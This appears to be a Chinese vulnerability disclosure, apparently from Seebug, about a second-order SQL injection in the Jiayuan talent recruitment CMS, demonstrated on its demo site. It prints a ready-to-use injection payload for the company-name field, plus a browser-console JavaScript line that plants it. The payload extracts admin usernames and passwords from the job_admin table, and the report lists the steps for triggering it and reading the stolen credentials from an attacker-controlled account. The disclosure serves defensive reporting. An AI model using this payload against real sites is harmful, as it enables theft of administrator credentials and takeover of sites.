### 简要描述:
嘉缘人才系统1处二次注入.
(demo测试)
http://v2014.rccms.com/
### 详细说明:
注册一家公司账号,发布职位,然后修改它:
```
http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018
```
这里我们利用的是“公司名称”,将公司名称修改为:
```
a',1,0,0x7473746162,1,0,1,concat(char(@`'`),(select(group_concat(a_user,a_pass))from job_admin)))#'
```
其中0x7473746162为接受数据用的账号'tstab',由于有长度限制,所以这里使用5字节的账号。
面试修改页:
```
http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018
```
使用console修改“公司名称”
```
document.getElementById('comname').value='a\',1,0,0x7473746162,1,0,1,concat(char(@`\'`),(select(group_concat(a_user,a_pass))from job_admin)))#\'';
```
然后发布。
[<img src="https://images.seebug.org/upload/201411/23174030620bf542aeb01f41f82c2104d1fbbdab.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174030620bf542aeb01f41f82c2104d1fbbdab.png)
再随便找一份简历:
[<img src="https://images.seebug.org/upload/201411/2317425651b06d629015066197d4b4d316b341fe.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2317425651b06d629015066197d4b4d316b341fe.png)
,发送简历邀请,选则刚才的职位test
[<img src="https://images.seebug.org/upload/201411/2317431591f6bd7b399e625ef1134ce6589201cb.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2317431591f6bd7b399e625ef1134ce6589201cb.png)
提交发送,会看到SQL error
[<img src="https://images.seebug.org/upload/201411/23174354199a05c65e0a22ae2a9d0789aefcea20.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174354199a05c65e0a22ae2a9d0789aefcea20.png)
但是没关系,数据已经可以再tstab账号看到了。
使用账号tstab登录,进入会员中心=>求职管理=>收到的面试通知,可以看到刚发的面试通知,
[<img src="https://images.seebug.org/upload/201411/23174501e2dff9930e8e4c1fc14247b96c5ffcaf.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23174501e2dff9930e8e4c1fc14247b96c5ffcaf.png)
进去即可以看到job_admin表的内容了:
[<img src="https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231814131793b0e43c80c8378ac38da13c158f71.png)
暂无评论